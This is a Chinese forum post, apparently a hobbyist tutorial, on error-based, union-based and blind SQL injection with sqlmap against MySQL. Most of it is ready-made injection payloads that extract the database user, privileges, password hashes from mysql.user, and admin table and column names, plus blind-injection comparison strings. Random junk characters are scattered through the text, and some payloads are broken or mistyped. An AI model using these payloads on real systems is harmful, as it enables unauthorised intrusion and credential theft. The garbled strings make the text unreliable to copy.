放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
1 @' G- z4 r; ~; S! b& ?, {. h % Z2 @7 [3 W {- @& s/ j
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
7 S X$ I- s. Z5 |# }; F9 y ( S5 e3 s- s; n$ X2 c1 i5 z/ S
分类标准 分类 备注# ^0 }9 y ]4 L. e
按字段类型 整型注入,字符型注入 & s1 k. f, x' ~2 {% t: Z9 J
按出现的位置 get注入,post注入,cookie注入,http header注入 6 x( l: @. v* l0 k; R# |/ e
然而高级注入是这样的( q S7 C" D& a% k# c# u
) i1 f$ R& ~) n" Z& F0 z2 J
高级注入分类 条件
, K* x) A& ` V7 U* Uerror-based sql 数据库的错误回显可以返回,存在数据库,表结构
0 S9 k3 z! `. Q1 M. J4 {. i7 Xunion-based sql 能够使用union,存在数据库,表结构
& @8 G8 H. a/ @8 yblind sql 存在注入 O2 c7 {- j, |
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。+ t# }7 |8 ~# C7 Y
) o$ e' K7 | g# Z3 L好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火9 V- D2 }) D8 S! U0 t
" a( W: z/ B5 U% d+ J附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。2 h e" }. O( T" u# `2 B. S- p
0 Z% Y. R6 o6 h6 [这里用mysql说明, o: E g- _: K
0 z& ^0 A% e- `- c7 w% Y; _e注入坛子里很多了,请看戳我或者再戳我/ h- f: X" I- ~! A. B8 [
" i4 A$ O4 a* K4 d( `/ h+ C
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的" i. F: ?, u) C* M2 J! ^( J
" n$ c1 a. Z/ F" S) C; Q [获取当前数据库用户名
5 J! j4 e F5 d/ O2 j+ K
9 i$ n `# ]5 IUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C' Q4 D+ k1 w, c6 p; \+ A- {7 K
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
/ u0 Q. A6 X6 [8 SL, NULL#
1 z4 e9 o9 ^ ]$ _8 p, Q% H" O注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
! ?( I3 Q X, t% Y $ R1 E1 Z! J& r# Z# Y) I ]
获取数据库名) j) h$ z& R9 m4 h3 x6 k: e- }5 |
1 m6 H6 z# n5 I$ Y6 y. j! E
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#0 G) i7 Y& O2 o' } P: u+ U4 r
获取所有用户名' m: E/ D& n9 o5 L' U$ Z' R
0 i! Q& H: d( L8 `5 _/ B/ mUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
7 z# B3 h) a! V查看当前用户权限 }# K) s: n; f5 C/ g* ?- d
: M" [ s7 V" r( D0 Y% A
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
4 C# y# F' z, m8 W! G' C尝试获取密码,当然需要有能读mysql数据库的权限
& s& c6 a1 R) y* o8 X5 }
/ g6 h ~' w. W) P# w' |6 Z0 qUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#2 J$ z9 \9 P: |, }
获取表名,limit什么的自己搞啦
3 E7 w ^ u! A; p# M+ N5 X. E 6 H7 ]6 Z( c+ @, ^9 W9 D6 F
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
3 w* j% i" ]4 g+ r# ? a. S/ w( X# G' X7 w获取字段名及其类型+ f$ D, z8 L% o- Y- u' l' _/ v4 T
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
- g0 Q& \* h! ]2 b- ~8 t ; L4 ~' t; e3 K6 _1 u
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。5 k; u2 p5 [) t$ M' x8 D6 g
& A: U' d* r/ x9 Q2 s
如:% w( |) V: g5 S2 f" n
获取当前用户名3 t# P0 O; N' c& G) y
% w2 ^# V+ i- MAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
/ Z. j. z% N4 V% [6 Z$ P( A" G' |获取当前数据库% F7 T3 A- \/ t
3 {2 R& ^; m* X1 K
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
9 T% I$ c- G+ Q! K: Q9 b6 `获取表名! c2 q" B" M8 X% l0 g+ k) z- r
. c. [# N5 K/ \
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 517 v* ]$ C, s7 N$ c
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。) M8 }! c- J% }. e
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
5 F- {6 D9 n8 a2 ^爆表5 K, N& l! e; `( q
" A3 w3 G$ g6 F. KAND EXISTS(select * from table)* v) [5 X [0 d2 ~# a
爆字段
9 [4 y( x4 b- e7 @5 c
3 Q2 W C$ R0 b" T. yAND EXISTS(select pwd from table)7 a, ?3 E7 N* D
盲注的变化就比较多了,由于篇幅,只是举个例子而已。$ a# S# Y5 q" x- F4 F/ U# }' ]
3 j3 m- N/ R2 i) A2 T: b2 Y. f本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。. i8 s1 ~( W3 Y( p, ?
|